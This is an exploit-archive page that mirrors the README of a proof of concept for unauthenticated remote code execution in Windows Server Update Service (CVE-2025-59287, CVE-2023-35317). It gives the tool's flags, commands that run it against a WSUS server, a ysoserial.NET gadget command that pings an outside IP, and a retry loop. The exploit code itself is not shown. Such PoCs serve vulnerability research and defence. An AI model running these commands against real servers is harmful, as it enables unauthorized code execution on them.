Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-35317 PoC — Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability

Source
https://github.com/M507/CVE-2025-59287-PoC
Associated Vulnerability
Title:Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability (CVE-2023-35317)
Description:Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
Description
Unauthenticated RCE PoC in Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317
Readme
# CVE-2025-59287 / CVE-2023-35317 PoC

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

## Usage

Required flags:
- `--target-url` – Target WSUS server base URL, e.g. `http://WIN-246JC0TE3BB.vuln.local:8530`
- `--cve` – One of `CVE-2023-35317` or `CVE-2025-59287`

Optional flags:
- `--dns-name` – Client DNS name used in SOAP requests (default: `bugcrowd.local`)
- `--random` – Prefix `--dns-name` with a random subdomain so each run appears as a new client
- `--payload` – Custom base64-encoded ysoserial payload; if omitted, a built-in payload is used for the chosen `--cve`
- `--debug` – Enable verbose debug logging (`[DEBUG]` lines)


## CVE-2025-59287
1. `python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random`
> ![alt text](ss/2025_poc.png)


## Manual trigger – CVE-2023-35317
1. (Optional) Generate a payload using Ysoserial.Net if you do not want to use the built-in one (or rely on the built-in payload).
2. Run:
   `python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random`
3. Open WSUS console

> ![alt text](ss/2023_poc.png)

## Automatic trigger – CVE-2023-35317
1. `./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64` (or rely on the built-in payload for `--cve CVE-2023-35317`)
2. ```for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done```
3. Wait 1-3 minutes and it will spawn under the service’s process.
4. Monitor icmp connections: `sudo tcpdump -l -n -i any icmp | while read line; do   echo "$line";   echo -ne '\a'; done`

> ![alt text](ss/2023_poc_process.png)
File Snapshot

 [4.0K]  /data/pocs/b4d659d06a4dfcc718f8cff2e77f841d7596066a
├── [1.0K]  LICENSE
├── [ 19K]  PoC.py
├── [2.1K]  README.md
└── [4.0K]  ss
    ├── [1.1M]  2023_poc.png
    ├── [384K]  2023_poc_process.png
    └── [211K]  2025_poc.png

2 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →